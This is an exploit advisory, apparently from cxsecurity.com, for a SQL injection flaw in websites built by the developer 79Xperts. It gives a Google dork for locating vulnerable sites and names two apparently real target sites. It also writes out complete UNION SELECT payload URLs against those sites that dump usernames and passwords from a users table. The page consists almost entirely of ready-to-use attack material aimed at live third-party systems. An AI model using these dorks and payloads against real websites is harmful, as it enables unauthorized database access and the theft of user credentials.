9Xperts SQL Injection Vulnerability

Published
Credit
Risk
2017.05.07
Zero Security Group
Medium
CWE
CVE
Local
Remote
CWE-89
N/A
No
Yes
Dork: intext:"Developed by 79Xperts" inurl:.php?id=

# Exploit Title: 79Xperts SQL Injection Vulnerability
# Google Dork: intext:"Developed by 79Xperts" inurl:.php?id=
# Date: 2017-05-06
# Exploit Author: Sh4dow (Bl4ckDays@Gmail.Com)
# My Team: Zero Security Group
# Vendor Homepage: https://www.79xperts.com
# Tested on: Kali Linux
---------------------------------------------------------------------------------------
Demo:
http://afco.com.sa/products.php?cid=12'

http://iurc.edu.pk/photos.php?id=5'

Exmple:

http://127.0.0.1/index.php?id=-1'+1,2,Group_Concat(user_name,0x3a,password),3+from+users--+


Demo Injection:
http://afco.com.sa/products.php?cid=-12%27+UNION+ALL+SELECT+1,2,3,4,5,Group_Concat(user_name,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--+&sid=32&ssid=0

http://iurc.edu.pk/photos.php?id=-5%27+UNION+SELECT+1,Group_Concat(user_name,0x3a,password),3+From+users--+

----------------------------------------------------------------------------------------
# Greetz : My PC
# We Are:Sh4dow - Ghostman - SOLTAN SILENT - R3dC4t And All Member
# Iranian Underground Researchers
# https://telegram.me/ZeroSecOfficial


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com